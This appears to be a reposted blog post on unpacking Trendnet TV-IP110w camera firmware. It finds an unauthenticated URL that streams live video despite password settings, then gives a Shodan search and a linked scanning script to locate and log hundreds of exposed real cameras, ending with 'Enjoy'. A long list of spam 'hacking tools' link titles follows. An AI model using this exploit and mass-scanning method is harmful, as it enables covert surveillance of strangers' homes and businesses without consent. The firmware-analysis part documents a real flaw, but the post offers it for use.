Now that we got that out of the way... I have been seeing posts on sites with people having fun with embedded systems/devices and I was feeling left out. I didn't really want to go out and buy a device so I looked at what was laying around.
Enter the Trendnet TV-IP110w - http://www.trendnet.com/products/proddetail.asp?prod=145_TV-IP110W
To start off the latest firmware for this device can be found at the following location :
First order of business was to update the camera with the most recent firmware:
![]() |
Device info page confirming firmware version |
Now that the device was using the same version of firmware as I was going to dive into, lets get to work. I will be using binwalk to fingerprint file headers that exist inside the firmware file. Binwalk can be downloaded from the following url: http://code.google.com/p/binwalk/
Running binwalk against the firmware file
binwalk FW_TV-IP110W_1.1.0-104_20110325_r1006.pck
DECIMAL HEX DESCRIPTION
-------------------------------------------------------------------------------------------------------
32320 0x7E40 gzip compressed data, from Unix, last modified: Thu Mar 24 22:59:08 2011, max compression
679136 0xA5CE0 gzip compressed data, was "rootfs", from Unix, last modified: Thu Mar 24 22:59:09 2011, max compression
Looks like there are two gzip files in the "pck" file. Lets carve them out using 'dd'. First cut the head off the file and save it off as '1_unk'
#dd if=FW_TV-IP110W_1.1.0-104_20110325_r1006.pck of=1_unk bs=1 count=32320
32320+0 records in
32320+0 records out
32320 bytes (32 kB) copied, 0.167867 s, 193 kB/s
Next cut out the first gzip file that was identified, we will call this file '2'
#dd if=FW_TV-IP110W_1.1.0-104_20110325_r1006.pck of=2 bs=1 skip=32320 count=646816
646816+0 records in
646816+0 records out
646816 bytes (647 kB) copied, 2.87656 s, 225 kB/s
Finally cut the last part of the file out that was identified as being a gzip file, call this file '3'
#dd if=FW_TV-IP110W_1.1.0-104_20110325_r1006.pck of=3 bs=1 skip=679136
2008256+0 records in
2008256+0 records out
2008256 bytes (2.0 MB) copied, 8.84203 s, 227 kB/s
For this post I am going to ignore files '1_unk' and '2' and just concentrate on file '3' as it contains an interesting bug :) Make a copy of the file '3' and extract it using gunzip
#file 3
3: gzip compressed data, was "rootfs", from Unix, last modified: Thu Mar 24 22:59:09 2011, max compression
#cp 3 3z.gz
#gunzip 3z.gz
gzip: 3z.gz: decompression OK, trailing garbage ignored
#file 3z
3z: Minix filesystem, 30 char names
As we can see the file '3' was a compressed Minix file system. Lets mount it and take a look around.
#mkdir cameraFS
#sudo mount -o loop -t minix 3z cameraFS/
#cd cameraFS/
#ls
bin dev etc lib linuxrc mnt proc sbin server tmp usr var
There is all sorts of interesting stuff in the "/server" directory but we are going to zero in on a specific directory "/server/cgi-bin/anony/"
#cd server/cgi-bin/anony/
#ls
jpgview.htm mjpeg.cgi mjpg.cgi view2.cgi
The "cgi-bin" directory is mapped to the root directory of http server of the camera, knowing this we can make a request to http://192.168.1.17/anony/mjpg.cgi and surprisingly we get a live stream from the camera.
video stream. giving no fucks. |
Now at first I am thinking, well the directory is named "anony" that means anonymous so this must be something that is enabled in the settings that we can disable.... Looking at the configuration screen you can see where users can be configured to access the camera. The following screen shows the users I have configured (user, guest)
Users configured with passwords. |
Still after setting up users with passwords the camera is more than happy to let me view its video stream by making our previous request. There does not appear to be a way to disable access to the video stream, I can't really believe this is something that is intended by the manufacturer. Lets see who is out there :)
Because the web server requires authentication to access it (normally) we can use this information to fingerprint the camera easily. We can use the realm of 'netcam' to conduct our searches
HTTP Auth with 'netcam' realm |
Hopping on over to Shodan (http://www.shodanhq.com) we can search for 'netcam' and see if there is anyone out there for us to watch
9,500 results |
If we check a few we can see this is limited to only those results with the realm of 'netcam' and not 'Netcam'
creepy hole in the wall |
front doors to some business |
Doing this manually is boring and tedious, wouldn't it be great if we could automagically walk through all 9,500 results and log the 'good' hosts.... http://consolecowboys.org/scripts/camscan.py
This python script requires the shodan api libs http://docs.shodanhq.com/ and an API key. It will crawl the shodan results and check if the device is vulnerable and log it. The only caveat here is that the shodan api.py file needs to be edited to allow for including result page offsets. I have highlighted the required changes below.
def search(self, query,page=1):
"""Search the SHODAN database.
Arguments:
query -- search query; identical syntax to the website
page -- page number of results
Returns:
A dictionary with 3 main items: matches, countries and total.
Visit the website for more detailed information.
"""
return self._request('search', {'q': query,'page':page})
Last I ran this there was something like 350 vulnerable devices that were available via shodan. Enjoy.
Update: We are in no way associated with the @TRENDnetExposed twitter account.
Related linksUpdate: We are in no way associated with the @TRENDnetExposed twitter account.
- Hacking Tools For Pc
- Hack Tool Apk
- Pentest Recon Tools
- Pentest Tools Find Subdomains
- Pentest Tools Review
- Pentest Tools Github
- Pentest Tools Linux
- Hacking Tools Name
- Pentest Tools Website
- Hacking Tools Hardware
- Hacker Tools Windows
- Hack Website Online Tool
- Hacking Tools Pc
- Pentest Tools Free
- New Hack Tools
- Hacker Hardware Tools
- Hacker Tools Github
- Hacking Tools For Windows Free Download
- Tools Used For Hacking
- Hacking Tools Name
- Hacking Tools Online
- Hackrf Tools
- Hacker Tools Apk Download
- Hacking Tools Mac
- Hacking Tools Windows 10
- Top Pentest Tools
- Hacker Tools Software
- Pentest Tools Subdomain
- Pentest Tools Website Vulnerability
- Hacking Tools Usb
- Hacking Tools For Windows 7
- Pentest Tools
- Hacking Tools Download
- Hacking Tools Mac
- Pentest Tools Port Scanner
- Hacks And Tools
- Hack Tools For Windows
- Hacker Tools Github
- Pentest Automation Tools
- Pentest Tools Linux
- Hacker Tools Hardware
- Hack Tool Apk No Root
- Android Hack Tools Github
- Pentest Tools Review
- Hacker Tools List
- Pentest Automation Tools
- What Is Hacking Tools
- Hacker Tools 2019
- How To Hack
- Tools 4 Hack
- Pentest Tools Windows
- Free Pentest Tools For Windows
- Pentest Tools Tcp Port Scanner
- Hackers Toolbox
- Physical Pentest Tools
- Hacking Tools For Mac
- Tools 4 Hack
- Hacking Tools Github
- Hack Tools Online
- Hacker Tools For Pc
- Hacker Tools Free Download
- Hacker Tools For Windows
- Hacking Tools And Software
- Hacker Tools Free
- Hacker Tools For Mac
- Pentest Tools Download
- Hacking Tools Hardware
- Hacker Techniques Tools And Incident Handling
- What Are Hacking Tools
- Hacking Tools For Games
- Hacking Tools And Software
- Hack Rom Tools
- Hacking Tools Windows
- Hacking Tools For Beginners
- Hack Tools
- How To Hack
- Install Pentest Tools Ubuntu
- New Hacker Tools
- Pentest Tools Kali Linux
- Pentest Box Tools Download
- Ethical Hacker Tools
- Hacking Tools And Software
- Hack Rom Tools
- Hacking Tools Usb
- Hacker Tools Free
- Termux Hacking Tools 2019
- Best Hacking Tools 2020
- Easy Hack Tools
- Hacking Tools Hardware
- Free Pentest Tools For Windows
- Hacker Tools Free Download
- Pentest Tools Port Scanner
- Hacking Tools Download
- Hack Tools Download
- Hacker Tools For Ios
- Pentest Tools Alternative
- Pentest Tools Url Fuzzer
- Hacker Tools Apk Download
- Pentest Tools For Mac
- Hacking Tools Windows 10
- Hacking Tools Name
- Easy Hack Tools
- Hacker Tools
- Hacking Tools For Windows Free Download
- Hacking Tools For Windows 7
- Hacker Tools Software
- Hacker Tools For Ios
- Hacker Tools Apk
- Hacker Tools List
- Game Hacking
- Pentest Tools List
- Wifi Hacker Tools For Windows
- Black Hat Hacker Tools
- Hacker Tools For Pc
- Pentest Tools Android
- Usb Pentest Tools
- Hacking App
- Pentest Tools Bluekeep
- Hacking Tools Kit
- Pentest Recon Tools
- Hacker Tools Free
- Hacking Tools
- Hack And Tools
- Hacker Tools Software
- Nsa Hack Tools
- Ethical Hacker Tools
- Pentest Tools Windows
- What Is Hacking Tools
- Hacker
- Beginner Hacker Tools
- Hacking Tools Mac
- Hacker Tools 2019
- How To Install Pentest Tools In Ubuntu
- Computer Hacker
- How To Install Pentest Tools In Ubuntu
- Hak5 Tools
- Hacking App
- Best Hacking Tools 2019
- Hack Tools For Mac
- Hacker Tools List
- Pentest Tools Android
- Hack Tools Mac
- Best Hacking Tools 2019
- Hacking Tools Windows
- Pentest Tools Find Subdomains
- Hack Tools Mac
No hay comentarios.:
Publicar un comentario